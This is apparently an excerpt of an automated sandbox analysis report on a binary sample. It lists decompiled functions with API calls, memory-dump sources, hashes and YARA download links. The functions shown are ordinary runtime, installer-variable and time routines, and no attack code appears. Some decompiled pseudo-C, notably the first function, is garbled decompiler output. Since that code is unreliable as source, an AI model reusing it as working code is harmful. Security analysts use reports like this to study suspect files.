                                                                                                                                                                  • Instruction Fuzzy Hash: 7231CF31700226AFDB218E65E845BAB7BB5FF41310F95443AE861872B0E734D85ADB94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000C9F5, Relevance: 6.1, APIs: 4, Instructions: 76memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                                                  			E1000C9F5(signed char __eax, void* __ebx, void* __ecx, signed char __edx, void* __edi) {
				signed char _t12;
				intOrPtr* _t20;
				intOrPtr _t23;
				signed char _t37;
				intOrPtr _t40;
				signed int _t42;

				_t36 = __edx;
				_t11 = __eax;
				do {
					 *_t11 =  *_t11 + _t36;
					asm("rol dh, 1");
					 *_t11 =  *_t11 + _t36;
					_t12 = _t11 ^ 0x000000ba;
					 *_t12 =  *_t12 + _t36;
					asm("adc al, 0xbe");
					 *_t12 =  *_t12 + _t36;
					_t37 = _t36 & _t12;
					 *_t12 =  *_t12 + _t37;
					 *_t12 = 0x10;
					asm("movsd");
					 *_t12 =  *_t12 + _t37;
					asm("rol dword [eax], 0x10");
					_t36 = 0xc5;
					 *0xbd851000 =  *0xbd851000 + 0xc5;
					_push(ss);
					 *0xbd851000 =  *0xbd851000 + 0xc5;
					 *0xFFFFFFFF7A7B2000 =  *((intOrPtr*)(0xffffffff7a7b2000)) + 0xc5;
					 *(0xffffffff7a7b2000 & _t42) =  *(0xffffffff7a7b2000 & _t42) + 0xc5;
					_t11 = 0xbc671000;
					 *0xbc671000 =  *0xbc671000 + 0xc5;
				} while ( *0xbc671000 >= 0);
				 *0xbc671000 =  *0xbc671000 + 0xc5;
				asm("les eax, [eax]");
				asm("adc [edx+0xc], ch");
				_push(0xc);
				_push(0x103314d0);
				_t18 = E10010594(0xbc671000, __edi, 0xc2af1000);
				_t40 =  *((intOrPtr*)(_t42 + 8));
				if(_t40 != 0) {
					if( *0x10337f3c != 3) {
						_push(_t40);
						goto L10;
					} else {
						L1000FA63(4);
						 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
						_t23 = E1000FADC(_t40);
						 *((intOrPtr*)(_t42 - 0x1c)) = _t23;
						if(_t23 != 0) {
							_push(_t40);
							_push(_t23);
							E1000FB07();
						}
						 *(_t42 - 4) = 0xfffffffe;
						_t18 = E1000CA96();
						if( *((intOrPtr*)(_t42 - 0x1c)) == 0) {
							_push( *((intOrPtr*)(_t42 + 8)));
							L10:
							_t18 = HeapFree( *0x10335310, 0, ??);
							_t48 = _t18;
							if(_t18 == 0) {
								_t20 = E1000F780(_t48);
								 *_t20 = E1000F745(GetLastError());
							}
						}
					}
				}
				return E100105D9(_t18);
			}









                                                                                                                                                                  0x1000c9f5
                                                                                                                                                                  0x1000c9f5
                                                                                                                                                                  0x1000c9fa
                                                                                                                                                                  0x1000c9fa
                                                                                                                                                                  0x1000c9fc
                                                                                                                                                                  0x1000c9fe
                                                                                                                                                                  0x1000ca00
                                                                                                                                                                  0x1000ca02
                                                                                                                                                                  0x1000ca04
                                                                                                                                                                  0x1000ca06
                                                                                                                                                                  0x1000ca08
                                                                                                                                                                  0x1000ca0a
                                                                                                                                                                  0x1000ca0d
                                                                                                                                                                  0x1000ca10
                                                                                                                                                                  0x1000ca16
                                                                                                                                                                  0x1000ca19
                                                                                                                                                                  0x1000ca1c
                                                                                                                                                                  0x1000ca1e
                                                                                                                                                                  0x1000ca20
                                                                                                                                                                  0x1000ca26
                                                                                                                                                                  0x1000ca2a
                                                                                                                                                                  0x1000ca2e
                                                                                                                                                                  0x1000ca31
                                                                                                                                                                  0x1000ca36
                                                                                                                                                                  0x1000ca36
                                                                                                                                                                  0x1000ca3a
                                                                                                                                                                  0x1000ca3d
                                                                                                                                                                  0x1000ca3f
                                                                                                                                                                  0x1000ca40
                                                                                                                                                                  0x1000ca42
                                                                                                                                                                  0x1000ca47
                                                                                                                                                                  0x1000ca4c
                                                                                                                                                                  0x1000ca51
                                                                                                                                                                  0x1000ca5a
                                                                                                                                                                  0x1000ca9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ca5c
                                                                                                                                                                  0x1000ca5e
                                                                                                                                                                  0x1000ca64
                                                                                                                                                                  0x1000ca69
                                                                                                                                                                  0x1000ca6f
                                                                                                                                                                  0x1000ca74
                                                                                                                                                                  0x1000ca76
                                                                                                                                                                  0x1000ca77
                                                                                                                                                                  0x1000ca78
                                                                                                                                                                  0x1000ca7e
                                                                                                                                                                  0x1000ca7f
                                                                                                                                                                  0x1000ca86
                                                                                                                                                                  0x1000ca8f
                                                                                                                                                                  0x1000ca91
                                                                                                                                                                  0x1000caa0
                                                                                                                                                                  0x1000caa8
                                                                                                                                                                  0x1000caae
                                                                                                                                                                  0x1000cab0
                                                                                                                                                                  0x1000cab2
                                                                                                                                                                  0x1000cac5
                                                                                                                                                                  0x1000cac7
                                                                                                                                                                  0x1000cab0
                                                                                                                                                                  0x1000ca8f
                                                                                                                                                                  0x1000ca5a
                                                                                                                                                                  0x1000cacd

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                  • Opcode ID: 91d68bd76e7703e056fce8e9dd49243a3d61e3c5222d378c7e6cca3091671d2d
                                                                                                                                                                  • Instruction ID: 7764d91bb7ab2f2a00e23681c00b78d4a37f2ec3e5ecfdf2bc9b2b987e4ed42f
                                                                                                                                                                  • Opcode Fuzzy Hash: 91d68bd76e7703e056fce8e9dd49243a3d61e3c5222d378c7e6cca3091671d2d
                                                                                                                                                                  • Instruction Fuzzy Hash: FA21F17AA0D3895FEB03CB704C85A893F60DF072D5F0A00DAE0449B1E7DA748C09CB52
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00435AB2, Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysAllocString.OLEAUT32(00401E67), ref: 00435AC5
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00435AD1
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00435B45
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00435B50
                                                                                                                                                                    • Part of subcall function 00435CFF: SysAllocString.OLEAUT32(?), ref: 00435D14
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: String$AllocVariant$ClearFreeInit
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 347726874-0
                                                                                                                                                                  • Opcode ID: c1c8f39274ece4991e9d83602e55827c75e17052a9171c67ade535ba7c596e35
                                                                                                                                                                  • Instruction ID: dede63f686c3db8059b666864581682c9699a9eade638963967dfe297755da23
                                                                                                                                                                  • Opcode Fuzzy Hash: c1c8f39274ece4991e9d83602e55827c75e17052a9171c67ade535ba7c596e35
                                                                                                                                                                  • Instruction Fuzzy Hash: 30214C71901619ABCB14DFA4D848EAFBBB8EF48715F101169E901AB210D735ED01CFA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A3D0, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001A3D0(void* __ebx, void* __edi, void* __esi, char* _a4) {
				int _v8;
				int _v12;
				short* _v16;

				_v16 = 0;
				_v12 = E1000CAD0(_a4);
				_v8 = MultiByteToWideChar(0, 0, _a4, _v12, 0, 0);
				_t9 = _v8 + 2; // 0x2
				_v16 = L1000CEAF(__ebx, _a4, __edi, __esi, _v8 + _t9);
				_t13 = _v8 + 2; // 0x2
				E1000CF80(__edi, _v16, 0, _v8 + _t13);
				MultiByteToWideChar(0, 0, _a4, _v12, _v16, _v8);
				_v16[_v8] = 0;
				return _v16;
			}






                                                                                                                                                                  0x1001a3d6
                                                                                                                                                                  0x1001a3e9
                                                                                                                                                                  0x1001a402
                                                                                                                                                                  0x1001a408
                                                                                                                                                                  0x1001a415
                                                                                                                                                                  0x1001a41b
                                                                                                                                                                  0x1001a426
                                                                                                                                                                  0x1001a442
                                                                                                                                                                  0x1001a44e
                                                                                                                                                                  0x1001a45a

                                                                                                                                                                  APIs
                                                                                                                                                                  • _strlen.LIBCMT ref: 1001A3E1
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A3FC
                                                                                                                                                                  • _memset.LIBCMT ref: 1001A426
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1001A442
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$_memset_strlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 745779501-0
                                                                                                                                                                  • Opcode ID: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
                                                                                                                                                                  • Instruction ID: 8dd7a9ca22c507c9c9ca29094530ba01303feab9f029a6df08f7648fa224dc70
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e3c2576653a9b42fdd310f43433bf8f26c3ae11fa9d2da111245d4e24b55a0e
                                                                                                                                                                  • Instruction Fuzzy Hash: 1D11F1B9E00208BFEB14CFD4D895F9EB7B4EB48704F108198FA099B381D671AA058B91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403B82, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00403B8E
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 00403BF5
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as numeric for variable: %ls, xrefs: 00403BE4
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 00403BC8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                  • API String ID: 3168844106-4270472870
                                                                                                                                                                  • Opcode ID: a1731366857e8d1aa50ff042858fb74ed9eea060ec1e3d07b5da242b6c4e0a1f
                                                                                                                                                                  • Instruction ID: 38b20f1d85783bf4ade0f111964c3c1ce6877057f52b45eb2760da9aaf40714e
                                                                                                                                                                  • Opcode Fuzzy Hash: a1731366857e8d1aa50ff042858fb74ed9eea060ec1e3d07b5da242b6c4e0a1f
                                                                                                                                                                  • Instruction Fuzzy Hash: CA019E36900225EBCF116F45CC05A8E3E39EB0432AF009176FD14BA291C73DEB10A7D8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403C02, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00413D65,?,WixBundleOriginalSource,00401EA4,?,?,?,00000001,?,?,00000001,?), ref: 00403C0E
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,?,00413D65,?,WixBundleOriginalSource,00401EA4,?,?,?,00000001,?,?), ref: 00403C75
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 00403C64
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 00403C48
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                  • API String ID: 3168844106-2100416246
                                                                                                                                                                  • Opcode ID: cb468e920ac39b43b4843556abf44f8660b03c287588f366473b6a9d6e057489
                                                                                                                                                                  • Instruction ID: 27765438aa07e2391a519ec962b624470b589de5c00cd989964ab4855677f583
                                                                                                                                                                  • Opcode Fuzzy Hash: cb468e920ac39b43b4843556abf44f8660b03c287588f366473b6a9d6e057489
                                                                                                                                                                  • Instruction Fuzzy Hash: C5014832905229EBDF116E55CC05A8E3E68AB00726F118136FD14BA290D37A9A209AD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403CF1, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00403CFD
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 00403D64
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 00403D37
                                                                                                                                                                  • Failed to get value as version for variable: %ls, xrefs: 00403D53
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                  • API String ID: 3168844106-1851729331
                                                                                                                                                                  • Opcode ID: 66e1197d5652c4d6ffab44df83496ed1ebd8ddf3cb7fda4f6b22b659b7298504
                                                                                                                                                                  • Instruction ID: c0dd27b9d72ef7a5e96431f32014e41f453be5263beb087582655b90f6d459ca
                                                                                                                                                                  • Opcode Fuzzy Hash: 66e1197d5652c4d6ffab44df83496ed1ebd8ddf3cb7fda4f6b22b659b7298504
                                                                                                                                                                  • Instruction Fuzzy Hash: 47017132900229FBCF116F55DC05A8E3F69AF10366F114136FD14B6290D33D9F10A798
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000CA40, Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 39%
                                                                                                                                                                  			E1000CA40(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x103314d0);
				_t8 = E10010594(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E100105D9(_t8);
				}
				if( *0x10337f3c != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x10335310, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E1000F780(_t31);
						 *_t10 = E1000F745(GetLastError());
					}
					goto L9;
				}
				L1000FA63(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1000FADC(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1000FB07();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1000CA96();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                                                                                  0x1000ca40
                                                                                                                                                                  0x1000ca42
                                                                                                                                                                  0x1000ca47
                                                                                                                                                                  0x1000ca4c
                                                                                                                                                                  0x1000ca51
                                                                                                                                                                  0x1000cac8
                                                                                                                                                                  0x1000cacd
                                                                                                                                                                  0x1000cacd
                                                                                                                                                                  0x1000ca5a
                                                                                                                                                                  0x1000ca9f
                                                                                                                                                                  0x1000caa0
                                                                                                                                                                  0x1000caa8
                                                                                                                                                                  0x1000caae
                                                                                                                                                                  0x1000cab0
                                                                                                                                                                  0x1000cab2
                                                                                                                                                                  0x1000cac5
                                                                                                                                                                  0x1000cac7
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000cab0
                                                                                                                                                                  0x1000ca5e
                                                                                                                                                                  0x1000ca64
                                                                                                                                                                  0x1000ca69
                                                                                                                                                                  0x1000ca6f
                                                                                                                                                                  0x1000ca74
                                                                                                                                                                  0x1000ca76
                                                                                                                                                                  0x1000ca77
                                                                                                                                                                  0x1000ca78
                                                                                                                                                                  0x1000ca7e
                                                                                                                                                                  0x1000ca7f
                                                                                                                                                                  0x1000ca86
                                                                                                                                                                  0x1000ca8f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ca91
                                                                                                                                                                  0x1000ca91
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ca91

                                                                                                                                                                  APIs
                                                                                                                                                                  • ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                  • ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFreeHeapLast___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2661975262-0
                                                                                                                                                                  • Opcode ID: d780af77af3ab278b6395a02338741367fa495b444a8d1c9c9272429d9e468c3
                                                                                                                                                                  • Instruction ID: 3e12d920bd94fb88c3074afbf6a3b3a9ea402cf26d7ac91cde5cb1516b55b14c
                                                                                                                                                                  • Opcode Fuzzy Hash: d780af77af3ab278b6395a02338741367fa495b444a8d1c9c9272429d9e468c3
                                                                                                                                                                  • Instruction Fuzzy Hash: 44016735A0531AAAFB10DBB18C86F5E3AA4EF023E9F210109F508AA0D5DF34A940DF56
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403C82, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00405900,00000000,?,00000000,00000000,00000000,?,004057E5,00000000,?,00000000,00000000), ref: 00403C8E
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,?,00405900,00000000,?,00000000,00000000,00000000,?,004057E5,00000000,?), ref: 00403CE4
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy value of variable: %ls, xrefs: 00403CD3
                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 00403CB4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                                                                                                                  • API String ID: 3168844106-2936390398
                                                                                                                                                                  • Opcode ID: 1099b003875badf870bf6f5c3e57efa93b26b465dc8326ce5f9587483286bc98
                                                                                                                                                                  • Instruction ID: 6c437455a87dcdaf22914444d8c26d3a08ed7d80b5df96ef5ff55de9c35bd096
                                                                                                                                                                  • Opcode Fuzzy Hash: 1099b003875badf870bf6f5c3e57efa93b26b465dc8326ce5f9587483286bc98
                                                                                                                                                                  • Instruction Fuzzy Hash: 9CF08133644229BBCF016F55CD05A8E3F29EF14356F108022FD14B6250D33ADB20AB98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001F5D0, Relevance: 6.0, APIs: 4, Instructions: 39timeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 91%
                                                                                                                                                                  			E1001F5D0() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				struct _SYSTEMTIME _v52;
				struct _FILETIME _v60;
				intOrPtr _t31;

				_v28.wYear = 0x7b2;
				_v28.wMonth = 1;
				_v28.wDay = 1;
				_v28.wHour = 0;
				_v28.wMinute = 0;
				_v28.wSecond = 0;
				_v28.wMilliseconds = 0;
				GetSystemTime( &_v52);
				SystemTimeToFileTime( &_v52,  &_v12);
				SystemTimeToFileTime( &_v28,  &_v60);
				_t31 = _v12.dwLowDateTime - _v60.dwLowDateTime;
				asm("sbb eax, [ebp-0x34]");
				_v36 = E1000F2F0(_t31, _v12.dwHighDateTime, 0x2710, 0);
				_v32 = _t31;
				return _v36;
			}










                                                                                                                                                                  0x1001f5d6
                                                                                                                                                                  0x1001f5dc
                                                                                                                                                                  0x1001f5e2
                                                                                                                                                                  0x1001f5e8
                                                                                                                                                                  0x1001f5ee
                                                                                                                                                                  0x1001f5f4
                                                                                                                                                                  0x1001f5fa
                                                                                                                                                                  0x1001f604
                                                                                                                                                                  0x1001f612
                                                                                                                                                                  0x1001f620
                                                                                                                                                                  0x1001f629
                                                                                                                                                                  0x1001f62f
                                                                                                                                                                  0x1001f640
                                                                                                                                                                  0x1001f643
                                                                                                                                                                  0x1001f64f

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemTime.KERNEL32(?), ref: 1001F604
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 1001F612
                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 1001F620
                                                                                                                                                                  • __aulldiv.LIBCMT ref: 1001F63B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$System$File$__aulldiv
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3735792614-0
                                                                                                                                                                  • Opcode ID: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
                                                                                                                                                                  • Instruction ID: af96395ebe124ed86fc63cf5983e6bcf699a861f8abc8f1b8a76f2a7ba2cf47c
                                                                                                                                                                  • Opcode Fuzzy Hash: 56842ad1edb196f60ab411e144c2dfedf5549195354fdd3cd1ae5dcdf75a643e
                                                                                                                                                                  • Instruction Fuzzy Hash: A501E575D1021DEADB00DFD4C8899EEB7B8FF04304F104649E904A7250EB79668ACB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00436E3F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000000), ref: 00436FA0
